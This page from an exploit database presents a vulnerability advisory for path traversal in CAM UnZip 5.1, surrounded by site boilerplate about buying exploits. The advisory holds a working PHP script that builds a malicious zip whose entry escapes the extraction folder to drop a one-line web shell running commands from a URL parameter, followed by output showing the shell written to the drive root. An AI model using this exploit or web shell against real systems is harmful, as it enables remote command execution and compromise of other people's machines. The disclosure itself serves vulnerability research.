0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CAM UnZip 5.1 - .'ZIP' File Directory Traversal
[+] Credits: hyp3rlinx Vendor: ================= www.camunzip.com Product: ============== CAM UnZip v5.1 Vulnerability Type: ====================== Archive Path Traversal CVE Reference: ============== N/A Vulnerability Details: ===================== CAM UnZip fails to check that the paths of the files in the archive do not engage in path traversal when uncompressing the archive files. specially crafted files in the archive containing '..\' in file name can overwrite files on the filesystem by backtracking or allow attackers to place malicious files on system outside of the target unzip directory which may lead to remote command execution exploits etc... Tested successfully Windows 7 Exploit code(s): =============== malicious archive script... <?php #CAM UnZip v5.1 #directory traversal to remote code execution exploit #==================================================== if($argc<2){echo "Usage: <filename>";exit();} $file_name=$argv[1]; $zip = new ZipArchive(); $res = $zip->open("$file_name.zip", ZipArchive::CREATE); $zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php exec($_GET["cmd"]); ?>'); $zip->close(); echo "Malicious archive created...\r\n"; echo "========= hyp3rlinx ============"; ?> ///////////////////////////////////////////////////////////////////////////////////// Result: Creating Folder: C:\Test\BOZO Extracting Files From: C:\Test\BOZO.zip Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28 1 file was Extracted. C:\RCE.php Exploitation Technique: ======================= Local Severity Level: ================ Medium # 0day.today [2024-12-26] #